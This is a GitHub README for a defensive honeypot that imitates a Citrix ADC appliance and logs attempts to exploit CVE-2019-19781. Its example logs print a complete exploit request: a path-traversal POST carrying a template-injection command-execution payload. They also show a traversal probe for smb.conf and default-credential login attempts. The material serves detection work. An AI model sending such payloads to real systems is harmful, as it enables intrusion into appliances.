Skip to content
Citrix ADC (NetScaler) Honeypot. Supports detection for CVE-2019-19781 and login attempts
Go
Branch: master
Clone or download

Latest commit

Latest commit fbb8f87 Jan 23, 2020

Files

Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
img
static
.gitattributes gitattributes Jan 23, 2020
LICENSE Initial commit Jan 22, 2020
README.md Update README.md Jan 23, 2020
main.go fixed content-type issue serving static files Jan 23, 2020

README.md

Citrix ADC (NetScaler) Honeypot

  • Detects and logs payloads for CVE-2019-19781 (Shitrix / Citrixmash)
  • Logs failed login attempts
  • Serves content and headers taken from real appliance in order to increase chance of indexing on search engines (e.g. google, shodan etc.)

screenshot

Installation

Precompiled

Precompiled Linux (x64) package available here

mkdir citrix-honeypot
cd citrix-honeypot
wget https://github.com/x1sec/citrix-honeypot/releases/download/v0.02/citrix-honeypot-linux-amd64.tar.gz
tar -xf citrix-honeypot-linux-amd64.tar.gz

go get

If you have a Go environment ready to go:

go get github.com/x1sec/citrix-honeypot

Running

Generate self signed certificate:

openssl genrsa -out server.key 2048
openssl ecparam -genkey -name secp384r1 -out server.key
openssl req -new -x509 -sha256 -key server.key -out server.crt -days 3650

It's easy as:

./citrix-honeypot

The honeypot will listen on both port 80 and 443 (so it must be run as root user)

Or to detach and run as a background process:

nohup ./citrix-honeypot &

Logs

Results / data is written to the ./log directory. They are:

hits.log - Scanning attempts and exploitation attempts with all data (e.g. headers, post body)

all.log - All HTTP requests that are observed hitting the server

logins.log - Attempted logins to the web interface

tlsErrors.log - Often internet scanners will send invalid data to port 443. HTTPS errors are logged here.

Examples

Running the first public released exploit:

$ cat logs/hits.log 
2020/01/23 08:27:55 
-------------------
Exploitation detected ...
src: xxx.xxx.xxx.xxx
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
Nsc_nonce: test1337
Nsc_user: /../../../../../../../../../../netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS
User-Agent: curl/7.67.0

url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'id | tee /netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb

Scanning attempt:

$ cat logs/hits.log 
2020/01/23 08:41:02 
-------------------
Scanning detected ... 
src: xxx.xxx.xxx.xxx
GET /vpn/../vpns/cfg/smb.conf HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
User-Agent: curl/7.67.0

Login attempts:

$ cat logs/logins.log
2020/01/23 07:26:03 Failed login from xxx.xxx.xxx.xxx user:nsroot pass:nsroot
2020/01/23 08:26:03 Failed login from xxx.xxx.xxx.xxx user:admin pass:admin
You can’t perform that action at this time.